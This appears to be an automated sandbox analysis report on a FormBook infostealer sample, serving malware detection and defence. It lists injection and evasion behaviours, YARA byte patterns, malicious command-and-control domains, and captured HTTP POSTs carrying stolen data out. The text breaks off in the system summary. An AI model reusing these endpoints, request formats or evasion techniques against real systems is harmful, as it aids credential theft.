
# Analysis Report R6o4qCis6s.exe

## Overview

### General Information

- Sample Name: R6o4qCis6s.exe
- Analysis ID: 287799
- MD5: 79f04bd1fc5f9757f7979bb8cbefdd5e
- SHA1: e34056989f520736af44df68d869b71a4d4d695f
- SHA256: 8aafecddd3b462d27c24000757496edb5c6bce1e6abff9157d5360457b0805d7
- Tags: exe

### Detection

FormBook
- Score: 100 (range: 0 - 100)
- Whitelisted: false
- Confidence: 100%

### Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected FormBook malware
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Contains functionality to detect sleep reduction / modifications
Creates an undocumented autostart registry key
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

### Classification

System is w10x64

- R6o4qCis6s.exe (PID: 6652, cmdline: 'C:\Users\user\Desktop\R6o4qCis6s.exe', MD5: 79F04BD1FC5F9757F7979BB8CBEFDD5E)
- R6o4qCis6s.exe (PID: 6680, cmdline: 'C:\Users\user\Desktop\R6o4qCis6s.exe', MD5: 79F04BD1FC5F9757F7979BB8CBEFDD5E)
- explorer.exe (PID: 3376, MD5: AD5296B280E8F522A8A897C96BAB0E1D)
- explorer.exe (PID: 7040, cmdline: C:\Windows\SysWOW64\explorer.exe, MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
- cmd.exe (PID: 368, cmdline: /c del 'C:\Users\user\Desktop\R6o4qCis6s.exe', MD5: F3BDBE3BB6F734E357235F4D5898582D)
- conhost.exe (PID: 6204, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- cleanup

## Malware Configuration

No configs have been found
| Source | Rule | Description | Author |
| --- | --- | --- | --- |
| 00000001.00000002.256707467.0000000000D30000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security |
| 00000001.00000002.256707467.0000000000D30000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com |
| 00000001.00000002.256707467.0000000000D30000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group |
| 00000005.00000002.480556818.00000000027D0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security |
| 00000005.00000002.480556818.00000000027D0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com |

Strings (Formbook_1, 00000001.00000002.256707467.0000000000D30000.00000040.00000001.sdmp):
- 0x98d8: $sequence_0: 03 C8 0F 31 2B C1 89 45 FC
- 0x9b42: $sequence_0: 03 C8 0F 31 2B C1 89 45 FC
- 0x15675: $sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
- 0x15161: $sequence_2: 3B 4F 14 73 95 85 C9 74 91
- 0x15777: $sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
- 0x158ef: $sequence_4: 5D C3 8D 50 7C 80 FA 07
- 0xa55a: $sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
- 0x143dc: $sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
- 0xb253: $sequence_7: 66 89 0C 02 5B 8B E5 5D
- 0x1b267: $sequence_8: 3C 54 74 04 3C 74 75 F4
- 0x1c26a: $sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Strings (Formbook, 00000001.00000002.256707467.0000000000D30000.00000040.00000001.sdmp):
- 0x18349: $sqlite3step: 68 34 1C 7B E1
- 0x1845c: $sqlite3step: 68 34 1C 7B E1
- 0x18378: $sqlite3text: 68 38 2A 90 C5
- 0x1849d: $sqlite3text: 68 38 2A 90 C5
- 0x1838b: $sqlite3blob: 68 53 D8 7F 8C
- 0x184b3: $sqlite3blob: 68 53 D8 7F 8C

Strings (Formbook_1, 00000005.00000002.480556818.00000000027D0000.00000040.00000001.sdmp):
- 0x98d8: $sequence_0: 03 C8 0F 31 2B C1 89 45 FC
- 0x9b42: $sequence_0: 03 C8 0F 31 2B C1 89 45 FC
- 0x15675: $sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
- 0x15161: $sequence_2: 3B 4F 14 73 95 85 C9 74 91
- 0x15777: $sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
- 0x158ef: $sequence_4: 5D C3 8D 50 7C 80 FA 07
- 0xa55a: $sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
- 0x143dc: $sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
- 0xb253: $sequence_7: 66 89 0C 02 5B 8B E5 5D
- 0x1b267: $sequence_8: 3C 54 74 04 3C 74 75 F4
- 0x1c26a: $sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

(22 entries in total)
| Source | Rule | Description | Author |
| --- | --- | --- | --- |
| 0.2.R6o4qCis6s.exe.41b0000.3.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security |
| 0.2.R6o4qCis6s.exe.41b0000.3.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com |
| 0.2.R6o4qCis6s.exe.41b0000.3.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group |
| 0.2.R6o4qCis6s.exe.4170000.2.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security |
| 0.2.R6o4qCis6s.exe.4170000.2.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com |

Strings (Formbook_1, 0.2.R6o4qCis6s.exe.41b0000.3.raw.unpack):
- 0x98d8: $sequence_0: 03 C8 0F 31 2B C1 89 45 FC
- 0x9b42: $sequence_0: 03 C8 0F 31 2B C1 89 45 FC
- 0x15675: $sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
- 0x15161: $sequence_2: 3B 4F 14 73 95 85 C9 74 91
- 0x15777: $sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
- 0x158ef: $sequence_4: 5D C3 8D 50 7C 80 FA 07
- 0xa55a: $sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
- 0x143dc: $sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
- 0xb253: $sequence_7: 66 89 0C 02 5B 8B E5 5D
- 0x1b267: $sequence_8: 3C 54 74 04 3C 74 75 F4
- 0x1c26a: $sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Strings (Formbook, 0.2.R6o4qCis6s.exe.41b0000.3.raw.unpack):
- 0x18349: $sqlite3step: 68 34 1C 7B E1
- 0x1845c: $sqlite3step: 68 34 1C 7B E1
- 0x18378: $sqlite3text: 68 38 2A 90 C5
- 0x1849d: $sqlite3text: 68 38 2A 90 C5
- 0x1838b: $sqlite3blob: 68 53 D8 7F 8C
- 0x184b3: $sqlite3blob: 68 53 D8 7F 8C

Strings (Formbook_1, 0.2.R6o4qCis6s.exe.4170000.2.unpack):
- 0x8ad8: $sequence_0: 03 C8 0F 31 2B C1 89 45 FC
- 0x8d42: $sequence_0: 03 C8 0F 31 2B C1 89 45 FC
- 0x14875: $sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
- 0x14361: $sequence_2: 3B 4F 14 73 95 85 C9 74 91
- 0x14977: $sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
- 0x14aef: $sequence_4: 5D C3 8D 50 7C 80 FA 07
- 0x975a: $sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
- 0x135dc: $sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
- 0xa453: $sequence_7: 66 89 0C 02 5B 8B E5 5D
- 0x1a467: $sequence_8: 3C 54 74 04 3C 74 75 F4
- 0x1b46a: $sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

(19 entries in total)

## Sigma Overview

No Sigma rule has matched

## Signature Overview

### AV Detection:

Antivirus / Scanner detection for submitted sample
- Source: R6o4qCis6s.exe, Avira: detected

Antivirus detection for URL or domain
- Source: http://www.heyidianzib.com/tln/, Avira URL Cloud: Label: malware
- Source: http://www.heyidianzib.com, Avira URL Cloud: Label: malware
- Source: http://www.heyidianzib.com/tln/www.olisolution.com, Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL
- Source: www.glowtey.com, Virustotal: Detection: 7%
- Source: http://www.glowtey.com/tln/, Virustotal: Detection: 8%
- Source: http://www.glowtey.com, Virustotal: Detection: 7%

Multi AV Scanner detection for submitted file
- Source: R6o4qCis6s.exe, Virustotal: Detection: 77%
- Source: R6o4qCis6s.exe, ReversingLabs: Detection: 79%

Yara detected FormBook
- Source: Yara match, File source: 00000001.00000002.256707467.0000000000D30000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match, File source: 00000005.00000002.480556818.00000000027D0000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match, File source: 00000005.00000002.482583136.00000000045B0000.00000004.00000001.sdmp, type: MEMORY
- Source: Yara match, File source: 00000005.00000002.476122908.0000000000220000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match, File source: 00000001.00000001.213014038.0000000000400000.00000040.00020000.sdmp, type: MEMORY
- Source: Yara match, File source: 00000001.00000002.256661656.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match, File source: 00000000.00000002.215688359.0000000004170000.00000004.00000001.sdmp, type: MEMORY
- Source: Yara match, File source: 00000000.00000002.215724959.00000000041B0000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match, File source: 00000001.00000002.256039719.0000000000400000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match, File source: 0.2.R6o4qCis6s.exe.41b0000.3.raw.unpack, type: UNPACKEDPE
- Source: Yara match, File source: 0.2.R6o4qCis6s.exe.4170000.2.unpack, type: UNPACKEDPE
- Source: Yara match, File source: 0.2.R6o4qCis6s.exe.41b0000.3.unpack, type: UNPACKEDPE
- Source: Yara match, File source: 1.1.R6o4qCis6s.exe.400000.0.unpack, type: UNPACKEDPE
- Source: Yara match, File source: 1.2.R6o4qCis6s.exe.400000.0.raw.unpack, type: UNPACKEDPE
- Source: Yara match, File source: 1.1.R6o4qCis6s.exe.400000.0.raw.unpack, type: UNPACKEDPE
- Source: Yara match, File source: 0.2.R6o4qCis6s.exe.4170000.2.raw.unpack, type: UNPACKEDPE
- Source: Yara match, File source: 1.2.R6o4qCis6s.exe.400000.0.unpack, type: UNPACKEDPE

Machine Learning detection for sample
- Source: R6o4qCis6s.exe, Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file
- Source: 0.2.R6o4qCis6s.exe.4170000.2.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
- Source: 0.2.R6o4qCis6s.exe.41b0000.3.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
- Source: 1.1.R6o4qCis6s.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
- Source: 1.2.R6o4qCis6s.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen

Contains functionality to enumerate / list files inside a directory
- Source: C:\Users\user\Desktop\R6o4qCis6s.exe, Code function: 0_2_00408D20 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime, 0_2_00408D20
- Source: C:\Users\user\Desktop\R6o4qCis6s.exe, Code function: 0_2_00405BE0 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 0_2_00405BE0

### Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
- Source: Traffic, Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.4:49734

HTTP GET or POST without a user agent
- Source: global traffic, HTTP traffic detected:
  GET /tln/?TTF=D8Oxqr&jfIlkD=Gih6PLZ1iCkKV6XaU73/B7cCcaHYH4uOLwbm5LWBOFF6YtYGomD/H0QVY53aBPOxn4Dm HTTP/1.1
  Host: www.cashflowtoday.net
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
- Source: global traffic, HTTP traffic detected:
  GET /tln/?jfIlkD=aheimOvVxRHS9+ZkV/8M4zSPjXUKcvGCrPlEERzYyjhu9GlhsqSRacAATphOmA3mqti9&TTF=D8Oxqr HTTP/1.1
  Host: www.themayoparty.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:

IP address seen in connection with other malware
- Source: Joe Sandbox View, IP Address: 34.102.136.180

Internet Provider seen in connection with other malware
- Source: Joe Sandbox View, ASN Name: AMAZON-02US
- Source: Joe Sandbox View, ASN Name: GOOGLEUS

Uses a known web browser user agent for HTTP communication
- Source: global traffic, HTTP traffic detected:
  POST /tln/ HTTP/1.1
  Host: www.themayoparty.com
  Connection: close
  Content-Length: 412
  Cache-Control: no-cache
  Origin: http://www.themayoparty.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.themayoparty.com/tln/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  Data Raw: 6a 66 49 6c 6b 44 3d 53 44 53 59 34 70 6a 41 33 6a 36 6e 38 70 55 4b 56 5a 31 79 6b 58 61 72 72 6e 38 72 62 76 4b 2d 76 4b 59 47 61 43 48 30 7a 57 56 55 34 55 74 77 39 76 6e 57 63 37 74 6e 43 73 73 52 6b 45 6e 4a 6d 74 4c 4a 6b 64 79 35 72 4a 33 4c 73 6f 39 50 58 34 73 6e 46 67 69 4a 56 6d 4a 6f 73 4c 73 31 4e 36 6e 31 6a 41 48 36 30 47 74 52 6d 46 6f 6b 32 51 75 66 52 53 46 32 42 6b 57 58 76 5f 67 4d 4c 33 57 67 74 67 28 4c 50 6a 77 52 5a 38 30 70 63 69 71 33 70 32 50 34 65 32 62 78 68 43 64 55 32 70 6f 59 48 54 73 5a 5a 4f 6e 70 66 42 7a 67 39 67 76 4a 6e 66 35 68 6f 35 49 65 71 34 72 4f 53 6e 35 77 55 4f 76 79 71 52 38 61 7e 55 76 62 51 4c 67 46 45 74 72 69 6c 41 72 50 4e 74 74 52 38 63 68 34 7a 6e 6f 56 4b 50 46 59 62 37 7e 5a 73 70 6c 71 37 7a 47 5f 33 78 38 6e 76 34 46 33 7e 73 4e 62 62 55 64 66 67 2d 34 44 4c 32 61 4f 6e 69 77 31 36 43 78 66 61 43 73 6f 42 30 30 48 49 4b 65 75 57 5a 61 79 76 46 56 56 6f 67 37 52 69 65 53 70 50 75 5a 52 69 4d 64 78 44 56 33 64 30 31 28 6c 59 6f 70 4d 4a 50 79 54 76 33 71 55 49 59 72 79 28 44 49 6e 34 32 76 57 49 72 39 50 63 44 28 37 43 76 46 51 76 4f 36 32 41 6f 51 58 59 59 62 32 6a 57 5a 4b 6f 76 55 46 63 73 76 74 4b 44 74 6b 65 55 35 46 33 31 6c 33 51 44 38 77 31 51 29 2e 00 00 00 00 00 00 00 00
  Data Ascii: jfIlkD=SDSY4pjA3j6n8pUKVZ1ykXarrn8rbvK-vKYGaCH0zWVU4Utw9vnWc7tnCssRkEnJmtLJkdy5rJ3Lso9PX4snFgiJVmJosLs1N6n1jAH60GtRmFok2QufRSF2BkWXv_gML3Wgtg(LPjwRZ80pciq3p2P4e2bxhCdU2poYHTsZZOnpfBzg9gvJnf5ho5Ieq4rOSn5wUOvyqR8a~UvbQLgFEtrilArPNttR8ch4znoVKPFYb7~Zsplq7zG_3x8nv4F3~sNbbUdfg-4DL2aOniw16CxfaCsoB00HIKeuWZayvFVVog7RieSpPuZRiMdxDV3d01(lYopMJPyTv3qUIYry(DIn42vWIr9PcD(7CvFQvO62AoQXYYb2jWZKovUFcsvtKDtkeU5F31l3QD8w1Q).
- Source: global traffic, HTTP traffic detected:
  POST /tln/ HTTP/1.1
  Host: www.themayoparty.com
  Connection: close
  Content-Length: 163864
  Cache-Control: no-cache
  Origin: http://www.themayoparty.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.themayoparty.com/tln/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  Data Raw: 6a 66 49 6c 6b 44 3d 53 44 53 59 34 72 44 2d 34 7a 28 5f 74 73 45 4c 48 35 6c 71 67 54 66 31 76 6e 41 34 5a 39 4c 48 77 4b 31 44 61 47 44 77 7e 7a 4a 4b 79 56 39 77 71 36 4c 64 49 4c 74 67 47 63 73 51 7a 55 6a 66 6c 36 33 42 6b 63 47 48 72 4a 28 49 69 37 30 46 57 6f 73 38 45 42 65 31 52 57 31 34 73 4a 6f 51 4e 5a 4c 39 32 77 44 36 77 32 6c 54 6a 55 34 57 78 56 43 61 4e 52 78 5f 48 6d 57 4f 76 4e 6b 65 4b 58 50 50 71 69 62 4e 43 78 73 4b 57 66 73 56 62 78 37 33 7a 79 6e 5f 52 52 79 31 28 56 4e 51 36 49 6f 6d 49 79 73 65 61 2d 28 67 56 6a 71 64 32 78 72 30 6b 50 6f 53 6f 34 51 67 7e 61 7e 51 57 6d 6c 34 54 5f 7a 55 68 41 6f 4c 79 48 72 44 55 4a 49 34 49 49 6a 4e 73 6b 6d 4b 48 64 49 4c 77 2d 6f 39 77 46 5a 72 46 61 31 55 54 75 61 78 71 36 70 79 6d 6a 61 35 37 53 63 72 68 4c 4d 36 35 76 67 30 44 55 64 30 6d 2d 34 58 44 6d 61 59 31 53 46 33 36 7a 42 32 61 45 73 45 4f 77 45 4b 46 70 71 75 59 63 7e 4a 70 31 46 5a 67 77 4c 74 31 4a 79 67 63 63 45 74 6c 4d 64 70 44 58 50 73 30 31 28 48 59 70 70 71 49 36 61 54 76 6e 4c 4b 50 5f 48 2d 32 6a 49 71 39 6e 66 55 54 73 30 45 63 44 6e 37 44 61 70 71 76 39 71 32 45 39 55 51 59 35 62 32 67 6d 5a 4b 6a
50 56 67 55 50 7e 41 48 6a 67 74 4f 58 41 77 36 41 30 42 66 53 74 65 33 79 39 67 72 6d 53 36 5a 6f 58 48 79 67 30 58 73 64 56 62 78 66 63 6b 51 2d 44 78 75 72 4e 30 4f 79 64 63 43 5f 28 4c 77 55 4d 76 35 35 74 58 28 74 4e 67 55 4d 76 59 68 63 51 6d 7a 4c 57 2d 59 76 6b 4e 72 65 61 4a 49 47 57 48 44 53 58 33 35 2d 46 30 76 74 51 67 42 44 35 4d 4e 4f 77 47 49 79 73 78 53 41 45 73 79 32 7a 39 48 6b 73 4d 34 69 6b 77 7a 70 34 32 32 72 70 61 78 70 33 33 35 70 50 6e 53 70 75 34 6b 59 7e 64 4c 62 74 65 47 73 5a 45 33 49 28 51 54 30 55 4e 4b 66 62 4b 46 48 77 71 36 68 54 6e 48 32 49 6c 4f 6c 50 75 43 72 43 62 48 65 73 67 33 32 7e 74 49 50 54 38 79 53 44 63 52 47 68 55 57 6a 51 76 6e 45 47 61 47 35 50 38 4e 62 42 48 6d 67 52 4c 7a 66 6d 2d 50 44 46 64 62 61 33 6c 7a 4a 6e 4f 43 39 61 48 6f 74 73 49 5a 55 65 31 7a 34 4f 70 37 4c 78 52 63 41 48 4a 45 31 6f 7a 45 39 5a 31 48 72 5a 56 6f 5a 4f 4b 6d 51 59 69 7e 36 31 68 78 5a 67 63 50 4e 4f 42 4b 6d 76 79 73 7a 66 77 43 35 43 79 6f 43 69 73 41 2d 77 57 6d 68 54 49 6a 77 5a 32 49 37 7e 57 43 77 70 51 33 67 68 63 46 49 39 4c 41 5a 56 30 62 61 74 49 48 47 74 64 30 6a 57 6c 5a 66 39 4a 73 43 4d 62 46 46 44 6f 55 67 6b 74 7a 48 6e 4a 42 41 41 6b 44 41 72 59 64 34 57 4d 4c 70 50 67 6a 74 5a 53 39 72 4e 6d 49 58 35 64 56 5a 76 74 55 70 72 58 4e 68 34 51 72 5f 30 4e 72 36 64 55 48 68 65 4a 28 2d 39 6c 74 59 72 6d 77 75 52 38 6f 70 33 56 45 53 75 43 70 2d 30 75 38 66 50 36 47 6a 66 4
- Source: global traffic, HTTP traffic detected:
  GET /tln/?TTF=D8Oxqr&jfIlkD=Gih6PLZ1iCkKV6XaU73/B7cCcaHYH4uOLwbm5LWBOFF6YtYGomD/H0QVY53aBPOxn4Dm HTTP/1.1
  Host: www.cashflowtoday.net
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
- Source: global traffic, HTTP traffic detected:
  GET /tln/?jfIlkD=aheimOvVxRHS9+ZkV/8M4zSPjXUKcvGCrPlEERzYyjhu9GlhsqSRacAATphOmA3mqti9&TTF=D8Oxqr HTTP/1.1
  Host: www.themayoparty.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:

Performs DNS lookups
- Source: unknown, DNS traffic detected: queries for: www.cashflowtoday.net

Posts data to webserver
- Source: unknown, HTTP traffic detected:
  POST /tln/ HTTP/1.1
  Host: www.themayoparty.com
  Connection: close
  Content-Length: 412
  Cache-Control: no-cache
  Origin: http://www.themayoparty.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.themayoparty.com/tln/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  Data Raw: 6a 66 49 6c 6b 44 3d 53 44 53 59 34 70 6a 41 33 6a 36 6e 38 70 55 4b 56 5a 31 79 6b 58 61 72 72 6e 38 72 62 76 4b 2d 76 4b 59 47 61 43 48 30 7a 57 56 55 34 55 74 77 39 76 6e 57 63 37 74 6e 43 73 73 52 6b 45 6e 4a 6d 74 4c 4a 6b 64 79 35 72 4a 33 4c 73 6f 39 50 58 34 73 6e 46 67 69 4a 56 6d 4a 6f 73 4c 73 31 4e 36 6e 31 6a 41 48 36 30 47 74 52 6d 46 6f 6b 32 51 75 66 52 53 46 32 42 6b 57 58 76 5f 67 4d 4c 33 57 67 74 67 28 4c 50 6a 77 52 5a 38 30 70 63 69 71 33 70 32 50 34 65 32 62 78 68 43 64 55 32 70 6f 59 48 54 73 5a 5a 4f 6e 70 66 42 7a 67 39 67 76 4a 6e 66 35 68 6f 35 49 65 71 34 72 4f 53 6e 35 77 55 4f 76 79 71 52 38 61 7e 55 76 62 51 4c 67 46 45 74 72 69 6c 41 72 50 4e 74 74 52 38 63 68 34 7a 6e 6f 56 4b 50 46 59 62 37 7e 5a 73 70 6c 71 37 7a 47 5f 33 78 38 6e 76 34 46 33 7e 73 4e 62 62 55 64 66 67 2d 34 44 4c 32 61 4f 6e 69 77 31 36 43 78 66 61 43 73 6f 42 30 30 48 49 4b 65 75 57 5a 61 79 76 46 56 56 6f 67 37 52 69 65 53 70 50 75 5a 52 69 4d 64 78 44 56 33 64 30 31 28 6c 59 6f 70 4d 4a 50 79 54 76 33 71 55 49 59 72 79 28 44 49 6e 34 32 76 57 49 72 39 50 63 44 28 37 43 76 46 51 76 4f 36 32 41 6f 51 58 59 59 62 32 6a 57 5a 4b 6f 76 55 46 63 73 76 74 4b 44 74 6b 65 55 35 46 33 31 6c 33 51 44 38 77 31 51 29 2e 00 00 00 00 00 00 00 00
  Data Ascii: jfIlkD=SDSY4pjA3j6n8pUKVZ1ykXarrn8rbvK-vKYGaCH0zWVU4Utw9vnWc7tnCssRkEnJmtLJkdy5rJ3Lso9PX4snFgiJVmJosLs1N6n1jAH60GtRmFok2QufRSF2BkWXv_gML3Wgtg(LPjwRZ80pciq3p2P4e2bxhCdU2poYHTsZZOnpfBzg9gvJnf5ho5Ieq4rOSn5wUOvyqR8a~UvbQLgFEtrilArPNttR8ch4znoVKPFYb7~Zsplq7zG_3x8nv4F3~sNbbUdfg-4DL2aOniw16CxfaCsoB00HIKeuWZayvFVVog7RieSpPuZRiMdxDV3d01(lYopMJPyTv3qUIYry(DIn42vWIr9PcD(7CvFQvO62AoQXYYb2jWZKovUFcsvtKDtkeU5F31l3QD8w1Q).

Urls found in memory or binary data

Contains functionality to read the clipboard data
- Source: C:\Users\user\Desktop\R6o4qCis6s.exe, Code function: 0_2_00424C58 GetClipboardData,CopyEnhMetaFileA,GetEnhMetaFileHeader, 0_2_00424C58

Contains functionality to retrieve information about pressed keystrokes
- Source: C:\Users\user\Desktop\R6o4qCis6s.exe, Code function: 0_2_0043A784 GetKeyboardState, 0_2_0043A784

### E-Banking Fraud:

Yara detected FormBook
- Source: Yara match, File source: 00000001.00000002.256707467.0000000000D30000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match, File source: 00000005.00000002.480556818.00000000027D0000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match, File source: 00000005.00000002.482583136.00000000045B0000.00000004.00000001.sdmp, type: MEMORY
- Source: Yara match, File source: 00000005.00000002.476122908.0000000000220000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match, File source: 00000001.00000001.213014038.0000000000400000.00000040.00020000.sdmp, type: MEMORY
- Source: Yara match, File source: 00000001.00000002.256661656.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match, File source: 00000000.00000002.215688359.0000000004170000.00000004.00000001.sdmp, type: MEMORY
- Source: Yara match, File source: 00000000.00000002.215724959.00000000041B0000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match, File source: 00000001.00000002.256039719.0000000000400000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match, File source: 0.2.R6o4qCis6s.exe.41b0000.3.raw.unpack, type: UNPACKEDPE
- Source: Yara match, File source: 0.2.R6o4qCis6s.exe.4170000.2.unpack, type: UNPACKEDPE
- Source: Yara match, File source: 0.2.R6o4qCis6s.exe.41b0000.3.unpack, type: UNPACKEDPE
- Source: Yara match, File source: 1.1.R6o4qCis6s.exe.400000.0.unpack, type: UNPACKEDPE
- Source: Yara match, File source: 1.2.R6o4qCis6s.exe.400000.0.raw.unpack, type: UNPACKEDPE
- Source: Yara match, File source: 1.1.R6o4qCis6s.exe.400000.0.raw.unpack, type: UNPACKEDPE
- Source: Yara match, File source: 0.2.R6o4qCis6s.exe.4170000.2.raw.unpack, type: UNPACKEDPE
- Source: Yara match, File source: 1.2.R6o4qCis6s.exe.400000.0.unpack, type: UNPACKEDPE

### System Summary:

 Detected FormBook malware Show sources
 Malicious sample detected (through community Yara rule) Show sources
 Source: 00000001.00000002.256707467.0000000000D30000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000001.00000002.256707467.0000000000D30000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000005.00000002.480556818.00000000027D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000005.00000002.480556818.00000000027D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000005.00000002.482583136.00000000045B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000005.00000002.482583136.00000000045B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000005.00000002.476122908.0000000000220000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000005.00000002.476122908.0000000000220000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000001.00000001.213014038.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000001.00000001.213014038.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 
